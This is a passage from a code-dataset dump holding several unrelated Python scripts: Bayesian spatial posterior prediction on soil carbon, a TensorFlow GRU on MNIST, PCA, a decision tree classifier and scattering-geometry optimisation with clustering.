row])\npart2_inst.set_mc_samples_from_list(part2_MC_sample)\npart2_inst.burnin(100)\n# 0 1 2 3 4 5 6 7 8 9 10 11\npart2_inst.set_variable_names([\"beta0\", \"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\", \"sigma2_T\", \"theta\", \"phi\", \"v\", \"sigma2_S\", \"tau2\"])\n# part2_inst.show_traceplot((6,2))\n# part2_inst.show_hist((6,2))\n# part2_inst.show_acf(30, (6,2))\n# part2_inst.print_summaries(4, latex_table_format=True)\n\n\n# Data loading and plotting\ndata_soil_carbon = []\ndata_soil_carbon_sd = []\ndata_landuse_str = []\ndata_long_x = []\ndata_lat_y = []\n\ndata_path = ['data/soil_carbon_MD.csv', 'data/soil_carbon_NJ.csv', 'data/soil_carbon_DE.csv', 'data/soil_carbon_PA.csv']\nfor path in data_path:\n with open(path, newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(csv_reader)\n # 0 ,1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12\n # \"\",\"sample_id\",\"rcapid\",\"soc\",\"soc_sd\",\"soc_measured\",\"sample_top\",\"sample_bottom\",\"texture\",\"elevation\",\"long\",\"lat\",\"landuse\"\n for row in csv_reader:\n # print(row)\n data_soil_carbon.append(float(row[3]))\n data_soil_carbon_sd.append(float(row[4]))\n data_long_x.append(float(row[10]))\n data_lat_y.append(float(row[11]))\n data_landuse_str.append(str(row[12])[1])\n# landuse_switcher = {'F':0, 'W':1, 'P':2, 'X':3}\n\ndata_pts = [(x,y) for x ,y in zip(data_long_x, data_lat_y)]\nlanduse_switcher_to_indicators = {'F':[0,0,0], 'W':[1,0,0], 'P':[0,1,0], 'X':[0,0,1]}\ndesign_mat_degree1_D1l = np.array([[1, x, y] + landuse_switcher_to_indicators[z] for x,y,z in zip(data_long_x, data_lat_y, data_landuse_str)])\n\n# ============================================================\nplt_cm = plt.cm.get_cmap('RdYlBu')\nfig_post_pred, axs_post_pred = plt.subplots(1, 3, figsize=(15, 5))\nfig_post_pred.tight_layout()\naxs_post_pred0 = axs_post_pred[0].scatter(data_long_x, data_lat_y, c=data_soil_carbon, vmin=0, vmax=55)\naxs_post_pred[0].set_title(\"soil carbon\")\nfor i, txt in enumerate(data_landuse_str):\n axs_post_pred[0].annotate(txt, (data_long_x[i], data_lat_y[i]))\naxs_post_pred0_handles, axs_post_pred0_labels = axs_post_pred0.legend_elements(prop=\"colors\", alpha=0.6)\naxs_post_pred[0].legend(axs_post_pred0_handles, axs_post_pred0_labels)\n\n\n\n# ============================================================\n# post_predictive dist on observed point\n# # 0 1 2 3 4 5 6 7 8 9 10 11\n# part2_inst.set_variable_names([\"beta0\", \"beta1\", \"beta2\", \"beta3\", \"beta4\", \"beta5\", \"sigma2_T\", \"theta\", \"phi\", \"v\", \"sigma2_S\", \"tau2\"])\n# n_data_pts = len(data_pts)\n# np_random_inst = np.random.default_rng(20230224)\n\n# post_pred_samples_on_obs_pt = []\n# for i, post_sample in enumerate(part2_inst.MC_sample):\n# if i%20==0 and i>0:\n# print(\"iteration\", i, \"/ 4000-100\")\n# # if i==20:\n# # break\n \n# matern_inst = Matern(post_sample[9], post_sample[10],post_sample[8])\n# matern_cov_mat = matern_inst.cov_matrix(data_pts) #at data points\n\n# post_cov_mat = matern_cov_mat + np.diag([post_sample[11] for _ in range(n_data_pts)])\n# # inv_cov_data_data, _ = sym_defpos_matrix_inversion_cholesky(cov_data_data)\n\n# beta = np.transpose(np.array(post_sample[0:6]))\n# post_mean = design_mat_degree1_D1l@beta\n \n# pred_sample = np_random_inst.multivariate_normal(post_mean, post_cov_mat)\n# post_pred_samples_on_obs_pt.append(pred_sample)\n\n# post_pred_inst = MCMC_Diag() #abused, but...\n# post_pred_inst.set_mc_samples_from_list(post_pred_samples_on_obs_pt)\n# post_pred_inst.write_samples('hw4_fullbayes_pred_samples')\n\n# =====================\npost_pred_inst = MCMC_Diag()\npost_pred_inst.set_mc_sample_from_csv('hw4_fullbayes_pred_samples')\n\n\npost_pred_mean = post_pred_inst.get_sample_mean()\npost_pred_var = post_pred_inst.get_sample_var()\npost_pred_quantile95 = post_pred_inst.get_sample_quantile([0.025, 0.975])\npost_pred_covered = []\ncount_covered = 0\nfor i, (soil, quant) in enumerate(zip(data_soil_carbon, post_pred_quantile95)):\n covered = 'Y' if quant[0] <= soil <= quant[1] else 'N'\n if covered=='Y':\n count_covered += 1\n post_pred_covered.append(covered)\nprint(count_covered)\n\naxs_post_pred1 = axs_post_pred[1].scatter(*zip(*data_pts), c=post_pred_mean, s=50, alpha=0.6, vmin=0, vmax=55)\naxs_post_pred1_handles, axs_post_pred1_labels = axs_post_pred1.legend_elements(prop=\"colors\", alpha=0.6)\naxs_post_pred[1].legend(axs_post_pred1_handles, axs_post_pred1_labels)\naxs_post_pred[1].set_title(\"predicted posterior mean\")\n\naxs_post_pred2 = axs_post_pred[2].scatter(*zip(*data_pts), c=[np.sqrt(x) for x in post_pred_var], s=50, alpha=0.6)\naxs_post_pred2_handles, axs_post_pred2_labels = axs_post_pred2.legend_elements(prop=\"colors\", alpha=0.6)\naxs_post_pred[2].legend(axs_post_pred2_handles, axs_post_pred2_labels)\naxs_post_pred[2].set_title(\"prediction postserior sd\")\nfor i, txt in enumerate(post_pred_covered):\n axs_post_pred[2].annotate(str(txt), (data_long_x[i], data_lat_y[i]))\n\nplt.show()","repo_name":"letsjdosth/SpatialStat","sub_path":"hw4_part5_postpred_on_obs.py","file_name":"hw4_part5_postpred_on_obs.py","file_ext":"py","file_size_in_byte":5981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31295447711","text":"import tensorflow\nimport numpy\nimport os\nimport random\nimport skimage.io\nimport sklearn.preprocessing\nimport time\n\nlog_dir='log/'\nmodel_dir='model/'\nbatch_size=100\nmax_step=60000\nrepeat_times=10\ninit_lr=0.001\ndecay_rate=0.01\ninput_dim=28\nhidden_dim=40\noutput_dim=10\n\n(train_data,train_label),(test_data,test_label)=tensorflow.keras.datasets.mnist.load_data()\nOneHotEncoder=sklearn.preprocessing.OneHotEncoder()\nOneHotEncoder.fit(train_label.reshape(-1,1))\ntrain_label=OneHotEncoder.transform(train_label.reshape(-1,1)).toarray()\ntest_label=OneHotEncoder.transform(test_label.reshape(-1,1)).toarray()\n\nt1=time.time()\n\ntrain_dataset=tensorflow.data.Dataset.from_tensor_slices({'data':train_data, 'label':train_label}).shuffle(train_data.shape[0]).repeat(repeat_times).batch(batch_size).prefetch(buffer_size=batch_size)\n# test_dataset=tensorflow.data.Dataset.from_tensor_slices({'data':test_data, 'label':test_label}).shuffle(test_data.shape[0]).repeat(repeat_times).batch(batch_size)\ntrain_iterator=train_dataset.make_one_shot_iterator()\n# test_iterator=test_dataset.make_one_shot_iterator()\ntrain_next=train_iterator.get_next()\n# test_next=test_iterator.get_next()\n\ndef gru(x,h_old):\n with tensorflow.variable_scope('gru',reuse=tensorflow.AUTO_REUSE):\n rxw=tensorflow.get_variable('rxw',[input_dim,hidden_dim])\n rhw=tensorflow.get_variable('rhw',[hidden_dim,hidden_dim])\n rb=tensorflow.get_variable('rb',hidden_dim)\n rxw_r=tensorflow.matmul(x,rxw)\n rhw_r=tensorflow.matmul(h_old,rhw)\n rz=rxw_r+rhw_r+rb\n r=tensorflow.nn.sigmoid(rz)\n\n uxw=tensorflow.get_variable('uxw',[input_dim,hidden_dim])\n uhw=tensorflow.get_variable('uhw',[hidden_dim,hidden_dim])\n ub=tensorflow.get_variable('ub',hidden_dim)\n uxw_r=tensorflow.matmul(x,uxw)\n uhw_r=tensorflow.matmul(h_old,uhw)\n uz=uxw_r+uhw_r+ub\n u=tensorflow.nn.sigmoid(uz)\n\n txw=tensorflow.get_variable('txw',[input_dim,hidden_dim])\n thw=tensorflow.get_variable('thw',[hidden_dim,hidden_dim])\n tb=tensorflow.get_variable('tb',hidden_dim)\n txw_r=tensorflow.matmul(x,txw)\n thw_r=tensorflow.matmul(r*h_old,thw)\n tz=txw_r+thw_r+tb\n t=tensorflow.nn.tanh(tz)\n\n h_new=(1-u)*h_old+u*t\n return h_new\n\ndef predict(x):\n with tensorflow.variable_scope('predict',reuse=tensorflow.AUTO_REUSE):\n w=tensorflow.get_variable('w',[hidden_dim,output_dim])\n b=tensorflow.get_variable('b',output_dim)\n z=tensorflow.matmul(x,w)+b\n return z\n\ndef process(data):\n init_hide=numpy.zeros([batch_size,hidden_dim]).astype(numpy.float32)\n encode_output=[]\n for i in range(28):\n if i==0:\n output_hide=gru(tensorflow.cast(data['data'][:,i],tensorflow.float32),init_hide)\n encode_output.append(output_hide)\n else:\n output_hide=gru(tensorflow.cast(data['data'][:,i],tensorflow.float32),output_hide)\n encode_output.append(output_hide) \n predict_output=predict(output_hide)\n return predict_output\n\nlen([x.name for x in tensorflow.get_collection(tensorflow.GraphKeys.GLOBAL_VARIABLES)])\n\ninput_data=tensorflow.placeholder(tensorflow.float32,[batch_size,28,28],name='input_data')\ninput_label=tensorflow.placeholder(tensorflow.float32,[batch_size,10],name='input_label')\nglobal_step = tensorflow.get_variable('global_step',initializer=0, trainable=False)\nlearning_rate=tensorflow.train.exponential_decay(init_lr,global_step,max_step,decay_rate)\n\nprocess_result=process(train_next)\n\nloss=tensorflow.losses.softmax_cross_entropy(tensorflow.cast(train_next['label'],tensorflow.float32),process_result)\n\nminimize=tensorflow.train.AdamOptimizer(learning_rate).minimize(loss,global_step=global_step,name='minimize')\n\n# accuracy,_=tensorflow.metrics.accuracy(input_label,tensorflow.nn.softmax(process_result))\naccuracy = tensorflow.reduce_mean(tensorflow.cast(tensorflow.equal(tensorflow.argmax(tensorflow.nn.softmax(process_result), 1), tensorflow.argmax(input_label, 1)), tensorflow.float32))\n\nSaver = tensorflow.train.Saver(max_to_keep=0,filename='gru')\n\nSession=tensorflow.Session()\nif tensorflow.train.latest_checkpoint(model_dir):\n Saver.restore(Session,tensorflow.train.latest_checkpoint(model_dir))\nelse:\n Session.run(tensorflow.global_variables_initializer())\n Session.run(tensorflow.local_variables_initializer())\n\ntensorflow.summary.scalar('loss', loss)\ntensorflow.summary.scalar('accuracy', accuracy)\nmerge_all = tensorflow.summary.merge_all()\nFileWriter = tensorflow.summary.FileWriter(log_dir, Session.graph)\n\nfor i in range(max_step*repeat_times//batch_size):\n # temp_train=Session.run(train_next)\n # Session.run(minimize,feed_dict={input_data:temp_train['data'],input_label:temp_train['label']})\n Session.run(minimize)\n # if Session.run(global_step)%100==1:\n # temp_test=Session.run(test_next)\n # summary = Session.run(merge_all, feed_dict={input_data:temp_test['data'],input_label:temp_test['label']})\n # FileWriter.add_summary(summary, Session.run(global_step))\n # Saver.save(Session, model_dir, global_step)\n # print(Session.run(accuracy, feed_dict={input_data:temp_test['data'],input_label:temp_test['label']}))\n print(Session.run(global_step))\n\nt2=time.time()\nprint(t2-t1)","repo_name":"zhaojinxi/learn_python","sub_path":"learn_tensorflow/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73918522704","text":"import os\n\nfile_list = []\ndef search(dirname):\n filenames = os.listdir(dirname)\n for filename in filenames:\n full_filename = os.path.join(dirname, filename)\n ext = os.path.splitext(full_filename)[-1]\n if ext == '.png':\n file_list.append(ext)\n\n","repo_name":"PE2-TeamB1-Project/Project","sub_path":"src/png_signal.py","file_name":"png_signal.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22707915927","text":"#encoding:utf-8\n#该算法介绍的是PCA,主成分分析,用于降维。实现原理是将原数据投影到k维的新坐标上,选择方差最大的前k个互相正交的直线方向作为坐标轴,实现过程为首先求数据各个特征之间的协方差矩阵,然后求其特征值和特征向量\n#因为要选择方差最大的前k个方向就是求前k个最大的特征值,其对应的特征向量就是要求的方向向量\nfrom numpy import *\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\n#读取数据\ndef loadDataSet(fileName,delim='\\t'):\n fr = open(fileName)\n stringArr = [line.strip().split(delim) for line in fr.readlines()]\n datArr = [map(float,data) for data in stringArr]\n return mat(datArr)\n\n#pca算法实现\ndef pca(dataMat,TopFeatureNumber=999999):#该函数的输入参数为数据集和降维后的维度,默认很大\n Datamean = dataMat.mean(axis=0)#求每列的平均值\n standardData = dataMat - Datamean#将数据进行标准化,使其的平均值变为0\n covMat = cov(standardData.T)#求协方差\n featureVal,featureMat = linalg.eig(covMat)#求特征值和特征向量,其中特征值featureVal[i]对应特征向量featureMat[:,i]\n featSortInd = argsort(-featureVal)#进行降序排序\n featSortInd = featSortInd[:TopFeatureNumber]#取特征值最大的前k维\n TopFeatMat = featureMat[:,featSortInd]#获得对应的特征向量,这个矩阵的行数是原数据的维度,列数是降维后的维度\n TransData = standardData*TopFeatMat#将原数据投影到新的空间中\n\n reconData = (TransData*TopFeatMat.T)+Datamean#将投影后的数据转换回原来的坐标系显示,即投影后的结果\n return TransData,reconData\n\n#在测试实际数据中存在缺失值NaN,该函数用于将这些值替换成该特征的平均值\ndef replaceNanWithMean():\n dataMat = loadDataSet('secom.data',' ')\n numFeat = shape(dataMat)[1]#获取特征的个数\n for i in range(numFeat):#将缺失值NaN变为该特征所有取值的平均值\n featMean = mean(dataMat[nonzero(~isnan(dataMat[:,i].A))[0],i])\n dataMat[nonzero(isnan(dataMat[:,i])),i] = featMean\n return dataMat\n\n#用于查看各特征值(即方差)所占的比例,为今后降维设置特征个数提供指导\ndef pcaTest(dataMat,TopFeatureNum=999999):#该函数的输入参数为数据集\n Datamean = dataMat.mean(axis=0)#求每列的平均值\n standardData = dataMat - Datamean#将数据进行标准化,使其的平均值变为0\n covMat = cov(standardData.T)#求协方差\n featureVal,featureMat = linalg.eig(covMat)#求特征值和特征向量,其中特征值featureVal[i]对应特征向量featureMat[:,i]\n FeatSortInd = argsort(-featureVal)#对特征值进行排序,这样图表比较好观察\n varSum = sum(featureVal)#计算特征值的总和\n percent = (featureVal[FeatSortInd]/varSum)*100\n Locator = MultipleLocator(5)#设置刻度\n fig = plt.figure()\n ax = fig.add_subplot(111)\n x = arange(0,TopFeatureNum,1)\n y = percent[:TopFeatureNum]\n\n ax.scatter(x,y,marker = 'o',s=50,c='red')\n ax.plot(x,y)\n ax.xaxis.set_major_locator(Locator)\n plt.show()\n\n\n#dataMat = loadDataSet('testSet.txt')\n# resultData,conData = pca(dataMat,1)\n# fig = plt.figure()\n# ax = fig.add_subplot(111)\n# ax.scatter(dataMat[:,0],dataMat[:,1],marker = '^',s=90)\n# ax.scatter(conData[:,0],conData[:,1],marker = 'o',s=50,c='red')\n# plt.show()\ndataMat = replaceNanWithMean()\npcaTest(dataMat,20)","repo_name":"pyrhaha/MachineLearning_Python","sub_path":"PCA/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25472770549","text":"import numpy as np\n'''\nA set of utility function\n'''\n\n\ndef rootMeanSquare(a):\n '''\n Calculates RMS for any 1D array like object\n '''\n rms = 0\n N = np.size(a)\n for i in range(0, N):\n rms = rms + a[i]**2\n rms = rms/N\n rms = np.sqrt(rms)\n return rms\n\n\ndef fixtimedata(t):\n '''\n Modifies time vector from vibration logger\n '''\n n = len(t)\n for i in range(n-1):\n if t[i+1] < t[i]:\n t[i+1:] = t[i+1:] + t[i]\n","repo_name":"albinan/BRAVibration","sub_path":"LIB/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1116437177","text":"import sys\nfrom collections import deque\ninput= sys.stdin.readline\nt= int(input())\n\nfor _ in range(t):\n rotate = False\n p = input().rstrip()\n n = int(input())\n arr = input().rstrip().strip('[]').split(',')\n if arr==['']: arr=[]\n q = deque(arr)\n \n try: \n for order in p: \n if order ==\"R\":\n rotate = not rotate\n else:\n if not rotate:\n q.popleft()\n else:\n q.pop()\n\n if rotate: q.reverse()\n print( \"[\" + \",\".join(q) + \"]\" )\n except:\n print(\"error\")\n \n","repo_name":"asdfqrt/barkingdog","sub_path":"07강 덱/AC.py","file_name":"AC.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38667664333","text":"from sklearn.metrics import accuracy_score\nimport numpy as np\nimport math\nfrom warnings import simplefilter\r\nsimplefilter(action='ignore', category=FutureWarning)\n\ndef clean_data(line):\n return line.replace('(', '').replace(')', '').replace(' ', '').strip().split(',')\n\ndef fetch_data(filename):\n with open(filename, 'r') as f:\n input_data = f.readlines()\n clean_input = list(map(clean_data, input_data))\n f.close()\n return clean_input\n\n\ndef readFile(dataset_path):\n input_data = fetch_data(dataset_path)\n input_np = np.array(input_data)\n return input_np\n\ntraining_data = './datasets/DT_train.txt'\ntesting_data = './datasets/DT_test.txt'\n\ntrain_np = readFile(training_data)\ntest_np = readFile(testing_data)\n\nlabels = train_np[:,-1]\ntrain_data = train_np[:,:-1]\n\ntest_labels = test_np[:,-1]\ntest_data = test_np[:,:-1]\n\ntrain_data = train_data.astype(np.float32)\ntest_data = test_data.astype(np.float32)\n\nunique_labels = np.unique(labels)\n\nfor i in range (0,labels.size):\n for j in range (0,unique_labels.size):\n if labels[i] == unique_labels[j]:\n labels[i] = j\n break\n \nfor i in range (0,test_labels.size):\n for j in range (0,unique_labels.size):\n if test_labels[i] == unique_labels[j]:\n test_labels[i] = j\n break\n \nlabels = labels.astype(np.float32)\ntest_labels = test_labels.astype(np.float32)\n\nlabels = np.reshape(labels, (-1, 1))\ntest_labels = np.reshape(test_labels, (-1, 1))\n\n#print(train_data)\n#print(test_data)\n#print(labels)\n#print(test_labels)\n\nclass Node():\n\n def __init__(self, feature_index=None, threshold=None, left=None, right=None, information_gain=None, value=None):\n \n self.feature_index = feature_index\n self.threshold = threshold\n self.left = left\n self.right = right\n self.information_gain = information_gain\n self.value = value\n\nclass DecisionTreeClassifier():\n \n def __init__(self, min_samples_split=2, max_depth=2):\n self.root = None\n self.min_samples_split = min_samples_split\n self.max_depth = max_depth\n \n def build_tree(self, dataset, curr_depth=0):\n \n X, Y = dataset[:,:-1], dataset[:,-1]\n num_samples, num_features = np.shape(X)\n \n if num_samples>=self.min_samples_split and curr_depth<=self.max_depth:\n best_split = self.get_best_split(dataset, num_samples, num_features)\n if best_split[\"information_gain\"]>0:\n left_subtree = self.build_tree(best_split[\"dataset_left\"], curr_depth+1)\n right_subtree = self.build_tree(best_split[\"dataset_right\"], curr_depth+1)\n return Node(best_split[\"feature_index\"], best_split[\"threshold\"], left_subtree, right_subtree, best_split[\"information_gain\"])\n \n leaf_value = self.calculate_leaf_value(Y)\n return Node(value=leaf_value)\n \n def get_best_split(self, dataset, num_samples, num_features):\n \n best_split = {}\n max_information_gain = -float(\"inf\")\n \n for feature_index in range(num_features):\n \n feature_values = dataset[:, feature_index]\n possible_thresholds = np.unique(feature_values)\n for threshold in possible_thresholds:\n dataset_left, dataset_right = self.split(dataset, feature_index, threshold)\n if len(dataset_left)>0 and len(dataset_right)>0:\n y, left_y, right_y = dataset[:, -1], dataset_left[:, -1], dataset_right[:, -1]\n curr_information_gain = self.information_gain_method(y, left_y, right_y, \"gini\")\n if curr_information_gain>max_information_gain:\n best_split[\"feature_index\"] = feature_index\n best_split[\"threshold\"] = threshold\n best_split[\"dataset_left\"] = dataset_left\n best_split[\"dataset_right\"] = dataset_right\n best_split[\"information_gain\"] = curr_information_gain\n max_information_gain = curr_information_gain\n return best_split\n \n def split(self, dataset, feature_index, threshold):\n dataset_left = np.array([row for row in dataset if row[feature_index]<=threshold])\n dataset_right = np.array([row for row in dataset if row[feature_index]>threshold])\n return dataset_left, dataset_right\n \n def information_gain_method(self, parent, l_child, r_child, mode=\"entropy\"):\n weight_l = len(l_child) / len(parent)\n weight_r = len(r_child) / len(parent)\n if mode==\"gini\":\n gain = self.gini_index(parent) - (weight_l*self.gini_index(l_child) + weight_r*self.gini_index(r_child))\n else:\n gain = self.entropy(parent) - (weight_l*self.entropy(l_child) + weight_r*self.entropy(r_child))\n return gain\n \n def entropy(self, y):\r\n #class_labels = np.unique(y)\r\n entropy = 0\n for cls in unique_labels:\n p_cls = len(y[y == cls]) / len(y)\n entropy += -p_cls * np.log2(p_cls)\n return entropy\n \n def gini_index(self, y):\r\n \r\n #class_labels = np.unique(y)\r\n gini = 0\n for cls in unique_labels:\n p_cls = len(y[y == cls]) / len(y)\n gini += p_cls**2\n \n return 1 - gini\n \n def calculate_leaf_value(self, Y):\n Y = list(Y)\n return max(Y, key=Y.count)\n \n def fit(self, X, Y):\n dataset = np.concatenate((X, Y), axis=1)\n self.root = self.build_tree(dataset)\n\n def predict(self, X):\r\n preditions = [self.single_prediction(x, self.root) for x in X]\r\n return preditions\r\n\r\n \r\n def single_prediction(self, x, tree):\r\n \r\n if tree.value!=None: return tree.value\r\n feature_val = x[tree.feature_index]\r\n if feature_val<=tree.threshold:\r\n return self.single_prediction(x, tree.left)\r\n else:\r\n return self.single_prediction(x, tree.right)\r\n\r\n\n \nclassifier = DecisionTreeClassifier(min_samples_split=3, max_depth=3)\r\nclassifier.fit(train_data,labels)\r\n\r\nY_pred = classifier.predict(test_data) \r\naccuracy_score(test_labels, Y_pred)\r\nprint(accuracy_score)\r\n","repo_name":"gouri-r/Machine-Learning-from-Scratch","sub_path":"DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33707067761","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport mplhep as hep\nimport scipy.optimize as spo\nimport scipy.signal as ssp\nimport umap\nimport umap.plot\nimport hdbscan\nimport itertools\nfrom sklearn.mixture import GaussianMixture\nhep.style.use(\"CMS\")\nmethod_ = \"BFGS\"\n\ndef indices(lst, item):\n return [i for i, x in enumerate(lst) if x == item]\n\ndef drop_preds(data,preds,val):\n index = []\n preds = indices(preds,val)\n index.append(preds)\n merged = list(itertools.chain(*index))\n new_index = np.sort(list(set(merged)))\n new_data = data.drop(new_index,axis=0)\n return new_data\n\ndef scatter_difference(coordinates: list, alpha: np.array, d:np.array, s:np.array):\n X, Y = coordinates\n theta = np.arctan2(Y,(X-s))\n phi = np.arctan2(Y,(d-X))\n inner_value = np.pi - alpha - theta - phi\n return np.abs(inner_value)**2\n\ndef loss_function(coordinates: list, alpha: np.array, d:np.array, s:np.array):\n alpha = np.array(alpha)\n d = np.array(d)\n s = np.array(s)\n X, Y = coordinates\n theta = np.arctan2(Y,(X-s))\n phi = np.arctan2(Y,(d-X))\n inner_value = np.pi - alpha - theta - phi\n return np.sum(np.abs(inner_value)**2)\n\ndef alpha_calc(X,Y,d,s):\n theta = np.arctan2(Y,(X-s))\n phi = np.arctan2(Y,(d-X))\n alpha = np.pi - theta - phi\n return alpha\n\ndef geo_difference(theory,exp):\n diff = np.sqrt(np.sum((theory-exp)**2))\n return diff\n\n\ndef loss_minimizer(alpha:np.array, d:np.array, s:np.array):\n alpha = np.array(alpha)\n s = np.array(s)\n d = np.array(d)\n X_guess = (d[0]-s[0])/2\n Y_guess = ((d[0]-s[0]))/(np.tan(alpha[0]))\n\n res_x = []\n res_y = []\n x_err = []\n y_err = []\n\n for i in range(0,4):\n # result = spo.basinhopping(func=loss_function, x0=[X_guess,Y_guess], niter=800, T=0, minimizer_kwargs = {\"args\":(alpha,d,s),\"method\":\"Powell\",\"bounds\":([0,15],[0,15])})\n result = spo.basinhopping(func=loss_function, x0=[X_guess,Y_guess], niter=800, T=0, minimizer_kwargs = {\"args\":(alpha,d,s),\"method\":method_,\"bounds\":([0,15],[0,15])})\n\n\n # inv_hessian = result.lowest_optimization_result.hess_inv.todense()\n # det_inv_hessian = inv_hessian[0][0] * inv_hessian[1][1] - inv_hessian[0][1] * inv_hessian[1][0]\n\n res_x.append(result.x[0])\n res_y.append(result.x[1])\n # x_err.append(np.sqrt(inv_hessian[1][1]/det_inv_hessian))\n # y_err.append(np.sqrt(inv_hessian[0][0]/det_inv_hessian))\n\n res_x = np.array(res_x)\n res_y = np.array(res_y)\n return [np.mean(res_x),np.mean(res_y)]\n\n\n# CHANGE TO YOUR VALUE\n# Declare true geometry\n# x_1_true = 12\n# x_2_true = 4\n# y_1_true = 8\n# y_2_true = 9\nx_1_true = 20\nx_2_true = 10\ny_1_true = 7\ny_2_true = 4\n\n# CHANGE TO YOUR VALUE\nX_bounds = [1,30]\nY_bounds = [1,10]\ngeometries = []\nsix_alpha_temp = []\nsix_s_temp = []\nsix_d_temp = []\nsix_label = []\nsix_x = []\nsix_y = []\ntwo_alpha_temp = []\ntwo_s_temp = []\ntwo_d_temp = []\ntwo_label = []\ntwo_x = []\ntwo_y = []\nvalid_geometry = []\nfor x in range(X_bounds[0],X_bounds[1]+1):\n for y in range(Y_bounds[0],Y_bounds[1]+1):\n for s in range(X_bounds[0],X_bounds[1]+1):\n for d in range(X_bounds[0]+1, X_bounds[1]):\n # alpha = alpha_calc(x,y,d,s)\n # geometries.append([s,d,alpha,x,y])\n # print(x)\n if (x == x_1_true) and (y==y_1_true):\n valid_alpha = alpha_calc(x,y,d,s)\n valid_geometry.append([x,y,d,s,valid_alpha])\n six_d_temp.append(d)\n six_s_temp.append(s)\n six_alpha_temp.append(valid_alpha)\n six_label.append(6) #Add dynamic (X,Y) here\n six_x.append(x)\n six_y.append(y)\n if (x == x_2_true) and (y==y_2_true):\n valid_alpha = alpha_calc(x,y,d,s)\n valid_geometry.append([x,y,d,s,valid_alpha])\n two_d_temp.append(d)\n two_s_temp.append(s)\n two_alpha_temp.append(valid_alpha)\n two_label.append(2) #Add dynamic (X,Y) here\n two_x.append(x)\n two_y.append(y)\n\ntwo_x = (two_d_temp[0]-two_s_temp[0])/2\nsix_x = (six_d_temp[0]-six_s_temp[0])/2\ntwo_y = ((two_d_temp[0]-two_s_temp[0]))/(np.tan(two_alpha_temp[0]))\nsix_y = ((six_d_temp[0]-six_s_temp[0]))/(np.tan(six_alpha_temp[0]))\ncombined_alpha = np.array(two_alpha_temp + six_alpha_temp)\ncombined_s = np.array(two_s_temp + six_s_temp)\ncombined_d = np.array(two_d_temp + six_d_temp)\ncombined_labels = six_label + two_label\ncombined_x = []\ncombined_y = []\n\n\nfor i in range(0,len(combined_s)):\n\n x_guess = float((combined_d[i]+combined_s[i])/2)\n # y_guess = ((combined_d[i]+combined_s[i]))/(np.sin(combined_alpha[i]))\n\n y_guess = np.abs(0.5*((combined_d[i]-combined_s[i]))/(np.tan(combined_alpha[0])))\n\n bounds = spo.Bounds(lb=[0,0],ub=[20,20])\n # result = spo.basinhopping(func=scatter_difference, niter=500, x0=list([x_guess,y_guess]), T=0, minimizer_kwargs = {\"args\":(combined_alpha[i],combined_d[i],combined_s[i]),\"method\":method_,\"bounds\":bounds})\n result = spo.basinhopping(func=scatter_difference, niter=20, x0=list([x_guess,y_guess]), T=0, minimizer_kwargs = {\"args\":(combined_alpha[i],combined_d[i],combined_s[i]),\"method\":method_})\n\n # result = spo.basinhopping(func=scatter_difference, niter=500, x0=[x_guess,y_guess], T=0, minimizer_kwargs = {\"args\":(combined_alpha[i],combined_d[i],combined_s[i]),\"method\":'Powell',\"bounds\":([0,20],[0, 20])})\n\n if result.x[0] < 0:\n combined_x.append(0)\n else:\n combined_x.append(result.x[0])\n if result.x[1] < 0:\n combined_y.append(0)\n else:\n combined_y.append(result.x[1])\n\ndata = {'x':combined_x,'y':combined_y}\ndata = pd.DataFrame(data = data)\n\n# birch clustering\nfrom numpy import unique\nfrom numpy import where\nfrom sklearn.datasets import make_classification\nfrom sklearn.cluster import Birch\nfrom matplotlib import pyplot\n# define dataset\n# X, _ = make_classification(n_samples=1000, n_features=2, n_informative=2, n_redundant=0, n_clusters_per_class=1, random_state=4)\nX = np.array(data)\nprint(\"AHHH\",len(X))\n# X[0] = X[ : ,0][(X[1])>2]\n# X[1] = X[ : ,1][(X[1])>2]\nX = X[X[ : ,1] > 2]\n\n# X.remove(X[1][X[1] < 2])\nprint(\"X data\",X)\n# define the model\nmodel = GaussianMixture(n_components=2,n_init=4,max_iter=500)\n# fit the model\nmodel.fit(X)\n# assign a cluster to each example\nyhat = model.predict(X)\n# retrieve unique clusters\nclusters = unique(yhat)\n# create scatter plot for samples from each cluster\ncoordinates = []\nfor i,cluster in enumerate(clusters):\n # get row indexes for samples with this cluster\n row_ix = where(yhat == cluster)\n # create scatter of these samples\n pyplot.scatter(X[row_ix, 0], X[row_ix, 1],label=\"Cluster \"+str(i))\n coordinates.append(np.array([X[row_ix, 0], X[row_ix, 1]]))\n# show the plot\n# print(coordinates)\npyplot.xlabel(\"X position (arb.)\")\npyplot.ylabel(\"Y position (arb.)\")\npyplot.legend(loc=\"upper right\")\npyplot.show()\n\nfor i in range(0,len(coordinates)):\n plt.scatter(coordinates[i][0],coordinates[i][1])\n\n plt.show()\n d = {'x':np.array(coordinates[i][0][0]),'y':np.array(coordinates[i][1][0])}\n Y = pd.DataFrame(d)\n Y = np.array(Y)\n\n # define the model\n model = GaussianMixture(n_components=2,n_init=4,max_iter=500)\n # fit the model\n model.fit(Y)\n # assign a cluster to each example\n yhat = model.predict(Y)\n # retrieve unique clusters\n clusters = unique(yhat)\n # create scatter plot for samples from each cluster\n # coordinates = []\n for 